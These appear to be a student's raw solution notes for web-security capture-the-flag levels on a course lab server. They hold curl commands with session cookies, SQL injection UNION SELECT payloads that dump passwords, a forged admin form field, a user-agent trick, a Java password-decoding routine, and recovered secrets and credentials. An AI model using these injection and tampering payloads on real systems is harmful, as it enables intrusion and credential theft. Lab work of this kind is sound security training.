Level 02
curl "http://cse545-web.pwn.college:8080/~level02/cgi-bin/users.php?filter=%27%27%20%2A" --cookie "webchall=344eb343e9861ffe62d4ab; PHPSESSID=465f33e25290c25ba6d498517df024ae; __utma=158548970.1220589816.1478498452.1492319494.1492362237.78; __utmc=158548970; __utmz=158548970.1489623356.51.16.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)" -v -e "http://cse545-web.pwn.college:8080/~level02/"
secretuser.txt : Jkg0EXQocl

http://cse545-web.pwn.college:8080/~level02/cgi-bin/users.php
level 03 
' UNION SELECT id, username , password FROM logins WHERE id = 5 ORDER by id ;
admin/7Pfhvz0W67


Level 05
curl -X POST -F "id=1234" -F "site=Fontaine" -F "password=Jiangft1213!" -F "admin=1" http://cse545-web.pwn.college:8080/~level05/cgi-bin/store.py -v --cookie "__utmt=1; __utma=158548970.1220589816.1478498452.1492362237.1492459981.79; __utmb=158548970.4.10.1492459981; __utmc=158548970; __utmz=158548970.1489623356.51.16.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); webchall=1c058ccba981ce8b63314ddacb6b91fe; user=admin"
9PzJawdJSG

level 03
curl -X GET -F "username=harry" -F "password=ginny" http://cse545-web.pwn.college:8080/~level03/cgi-bin/login.php" -v --cookie "__utmt=1; __utma=158548970.1220589816.1478498452.1492362237.1492459981.79; __utmb=158548970.4.10.1492459981; __utmc=158548970; __utmz=158548970.1489623356.51.16.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=9d5bdbff315ba2c779ef76396c47da75; webchall=1c058ccba981ce8b63314ddacb6b91fe"


level 6
curl -A "s3cr37.pwd" "http://cse545-web.pwn.college:8080/~level06/cgi-bin/index.php" --cookie "__utma=158548970.426547359.1493845771.1493845771.1493845771.1; __utmb=158548970.6.10.1493845771; __utmc=158548970; __utmz=158548970.1493845771.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; webchall=1c058ccba981ce8b63314ddacb6b91fe; PHPSESSID=9d5bdbff315ba2c779ef76396c47da75"
dbL9kqY0bA

level 8
Put this Dork in username:
admin' UNION SELECT password, password, password, password, password, password FROM users WHERE username='admin

' UNION SELECT id, username , password FROM logins WHERE id = 5 ORDER by id ; 


level 10
import java.util.HashMap;

public class pass {

	public static void main(String[] args) {
		// TODO Auto-generated method stub
		System.out.println(decrString("FKIVoHU2b9L"));
	}
	
	public static String decrString(String paramString)
	  {
	    char[] arrayOfChar1 = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z' };
	    HashMap localHashMap = new HashMap(arrayOfChar1.length);

	    for (int i = 0; i < arrayOfChar1.length; ++i)
	    {
	      localHashMap.put(Character.valueOf(arrayOfChar1[i]), Integer.valueOf(i));
	    }

	    char[] arrayOfChar2 = new char[paramString.length()];
	    for (int j = 0; j < paramString.length(); ++j)
	    {
	      int k = ((Integer)localHashMap.get(Character.valueOf(paramString.charAt(j)))).intValue();
	      if (j % 2 == 0)
	      {
	        int l = (k - j) % arrayOfChar1.length;
	        if (l < 0)
	        {
	          l += arrayOfChar1.length;
	        }
	        arrayOfChar2[j] = arrayOfChar1[l];
	      }
	      else
	      {
	        arrayOfChar2[j] = arrayOfChar1[((k + j) % arrayOfChar1.length)];
	      }
	    }

	    String str = new String(arrayOfChar2);
	    return str;
	  }

}
